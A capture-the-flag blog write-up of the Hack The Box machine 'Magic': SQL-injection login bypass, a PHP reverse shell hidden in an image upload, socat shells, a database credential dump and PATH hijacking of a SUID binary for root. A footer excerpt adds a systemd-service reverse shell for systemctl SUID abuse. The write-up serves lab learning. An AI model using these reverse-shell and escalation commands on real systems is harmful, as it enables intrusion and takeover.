Skip to main content

Hackthebox.eu - Retired - Magic

Hackthebox.eu - Retired- Magic


Recon


As always I start with a simple up/down scan using nmap on all TCP ports.


$ nmap -T4 -p- -oX ./nmapb.xml magic.htb


Then I convert the xml output to HTML ot make it pretty


xsltproc ./nmapb.xml -o ./nmapb.html



Not much open just 22 and 80


Let's scan those ports with -A to run all the scripts against those ports


$ nmap -T4 -A -p22,80 -oX ./nmapf.xml magic.htb


Then convert that to HTML too


xsltproc ./nmapf.xml -o ./nmapf.html



Looks like openSSH 7.6p1 on 22 and Apache 2.4.29 on 80


Let's see what he web server is serving up



Looks like a photo gallery web app


And there is a login page


http://magic.htb/login.php




Tried admin/admin for the hell of it






Exploit



What's a little SQLi between friends right?


The second thing I tried was 


admin'or'1'='1 for the user name



Well that was quick


Tried uploading a php file and got this error message




Dirb found some other folder around



Looks like there is an upload folder under images…. 


I assume this is where our uploaded pictures would go.



Let's try to upload a picture



And here is the evil hackerman I uploaded






And it didn't even rename the file.



So the name of the box here I think will help us figure out exactly what the next step is….


MAGIC


As in magic numbers.


https://www.garykessler.net/library/file_sigs.html


So the "Magic Numbers" are basically file headers that tell the OS what type of file it is. These are usually at the beginning of a file and are the first 4 or 5 bytes.


https://digital-forensics.sans.org/media/hex_file_and_regex_cheat_sheet.pdf


So my guess here is that it's using the magic number to filter out non wanted file types for upload…. Let's mess with the magic numbers of the jpeg we successfully uploaded to see if this in fact is their method for filtering here.


Enter Bless


Sudo apt-get install bless


I copied the jpeg and renamed it edited.jpg


Here is the file open in bless





As you can see here the first 4 bytes in hex are


FF D8


And back to mr kessler's website we see this is in fact the magic number for jpeg files






So let's change it to something else and try to upload it again to see if this is infact how they are filtering files...



Let's change it to be an email signature








After I tried to upload I got this error message


hmmmm



Well that didn't work. Lets see if we can edit in transit 



Let's fire up burp and capture the successful jpg upload again.


Let's try inserting our PHP script directly into the post 


I'm just going to insert some php directly into the request a bit after the beginning of the file to see if we can get shell


I'm going to just use a simple reverse shell back to a listener I have set up on my kali box.



<?php


exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.19/5555 0>&1'");


?>


Here you can see where i stuck the PHP in and renamed the file being uploaded



I'll just need my lisenter…


Nc -lnvp 5555



It uploaded now we can just browse to the image/php and hopefully we get our shell



Cool we got our foothold.



Poking around the file system I found a file named db.php5.



There is a user/pass


File that away for now and keep looking around



Didn't find much else in the file system. Tried to SU to theseus and SSH as theseus and neither worked let's see if we can get some info from the db



Here is the output of su


So we need to upgrade to tty… I searched around a lot and tried a bunch of different methods and finally came across this blog post that talks about using socat…


https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/


So I used wget and SimpleHTTPServer to send socat over to the magic box

wget http://10.10.14.19:8888/socat

Gave it execute rights

chmod +x socat


Then setup socat on my  kali box

socat file:`tty`,raw,echo=0 tcp-listen:4445



Finally start the connection from my shell

./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.14.19:4445




I guess that's not the right password..


Lets see if that DB we found mention of might have some different creds in it




Hmmm it says mysql is not installed… but there was the db info we found which 


I tried locate




I saw this interesting executable





And I can run it




https://dev.mysql.com/doc/refman/8.0/en/mysqldump.html


Had to play around with the syntax in order to use the user/pass we found earlier but finally got it done


mysqldump -u theseus -p --databases Magic > /tmp/circusmonkey/dump.sq


After reading the new dump we see another set of creds..


admin/Th3s3usW4sK1ng


This is the legit login for the upload function on the website.


Lets see if we can SU to theseus using this password..



Woot we are theseus


Lets get that hash



theseus@ubuntu:~$ cat ./user.txt 

d36***********************************



So what about escalation?


I copied linenum.sh and linpeas over to the magic box and ran both of them


This output from linpeas caught my eye


+] Readable files belonging to root and readable by me but not world readable                                                                        

-rwsr-x--- 1 root users 22040 Oct 21  2019 /bin/sysinfo       



There is an executable called sysinfo that is owned by root and I can execute it. It's a SUID file, which means when I run it I run it as root…..


Winnie The Pooh Reaction GIF



Let's see if we can figure out what it does.


Looks like it pulls back some info about the hardware of the machine. I can see why this program might need root privileges.


I wonder what is doing in the background to get these stats?


Running strings against it I saw this.


Strings /bin/sysinfo


Looks like it might just be running some other programs to get these results.



I know what cat does what does free do?



It gives us RAM stats….. 


It looks like from strings the program just calls free.. Let's start spy to see if we can get any more info about this


I used wget to xfer pspy64 over to the box and ran it with the sysinfo 




Cool it's just calling that executable and dumping the results out….  But the most important thing here is, it's calling it with non explicit path. It relies on free being in one of the directories of our Path environment variable.


So here is the cool thing about the Path environment variable… It doesn't care what executables are in the directories you supply it. It just looks for a matching executable in each directory and the first one it finds it uses that one…. So following out logic here if there are two executables with the same name on the system it will just go down the list of directories in the path variable until it finds one, in the order they are listed in the variable


So I can make a new executable named free in any directory I control, update the path variable to include my path first and it will execute my free executable instead of the one they are trying to call in this sysinfo program. 


The old switcheroo


Butters Stotch Soup GIF by South Park


So let's start with making our executable…


So the goal here is to get the root flag… We can just write it out to a directory we control like /tmp/circusmonkey2 that I created earlier.


So let's create our version of free


echo " cat /root/root.txt > /tmp/circusmonkey2/root.txt" > free  




Right now the path environment variable looks like this


PATH=:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games


We simply just want to put /tmp/circusmonkey2  at the beginning of it


We use the export command to change these variables so I will do


Export PATH=/tmp/circusmonkey2:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games



Now when we call any program without the explicit path it will look in our directory first to see if its there, then move down the path until it finds it


Now if we run /bin/sysinfo it should cat out the contents or /root/root.txt and put it in a new file in /tmp/circusmonkey2 called root.txt


Actually you know what? We forgot a step here. We forgot to give our version of free execute rights


Chmod +x ./free


So lets run sysinfo now


/bin/sysinfo


The program now stops at the mem usage phase, and doesn't show any RAM stats because its using our free now instead of the real one.



As you can see it did create root.txt for us


Alternatively to get that legit shell we can reuse socat to make another outgoing connection to our kali box as root



echo "

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.14.24:4455

" > free


Then start another listener on our kali box


socat file:`tty`,raw,echo=0 tcp-listen:4455



Now when we run /bin/sysinfo we get this



We are completely in as root


In the root directory we can see the C code that made the sysinfo executable


Slow Motion Reaction GIF by MOODMAN



Comments

Post a Comment

Popular posts from this blog

HacktheBox - Retired - Frolic

HacktheBox - Retired - Frolic Recon Let's start out with a threader3000 scan Some interesting results here Port 22 and 445 aren't uncommon… but 1880 and 9999 are.. Let's let nmap run through these ports  Option Selection: 1 nmap -p22,445,1880,9999 -sV -sC -T4 -Pn -oA 10.10.10.111 10.10.10.111 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 16:17 EDT Nmap scan report for 10.10.10.111 Host is up (0.060s latency). PORT     STATE SERVICE     VERSION 22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) |   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA) |_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519) 445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 1880/tcp open  http        Node.js (Express middlewar
Post a Comment
Read more

RingZero CTF - Forensics - Who am I part 2

RingZero CTF - Forensics -  Who am I part 2 Objective: I'm the proud owner of this website. Can you verify that? Solution: Well it took me a bit to figure this one out. I tried looking at the whois records for ringzer0ctf.com I tired looking at the DNS records for the site. I even looked in the Certificate for the site. Then I thought a little be more about the question. It's not asking how I can verify who own the site. It wants me to verify the owner themselves. Luckily at the bottom the page we see who is listed as on the twittter feeds @ringzer0CTF and @ MrUnik0d3r lets check if we can find the PGP for MrUniK0d3r online. I googled PGP and MrUn1k0d3r The very first result is his PGP  keybase.txt with his PGP at the bottom of the file is the flag FLAG-7A7i0V2438xL95z2X2Z321p30D8T433Z
Post a Comment
Read more

Abusing systemctl SUID for reverse shell

Today I came across a box that had the SUID set for systemctl connected as the apache user www-data I was able to get a root reverse shell. This is to document how to use this for privilege escalation. I used a bit from this blog https://carvesystems.com/news/contest-exploiting-misconfigured-sudo/ and a bit from here too https://hosakacorp.net/p/systemd-user.html Step1. Create a fake service I named my LegitService.service I placed it in the /tmp directory on the server. [Unit] UNIT=LegitService Description=Black magic happening, avert your eyes [Service] RemainAfterExit=yes Type=simple ExecStart=/bin/bash -c "exec 5<>/dev/tcp/10.2.21.243/5555; cat <&5 | while read line; do $line 2>&5 >&5; done" [Install] WantedBy=default.target Then in order to add this to a place we can use systemctl to call from I created a link from /tmp, since I didn't have permission to put the file in the normal systemd folders systemctl link /tmp/LegitService.service The
Post a Comment
Read more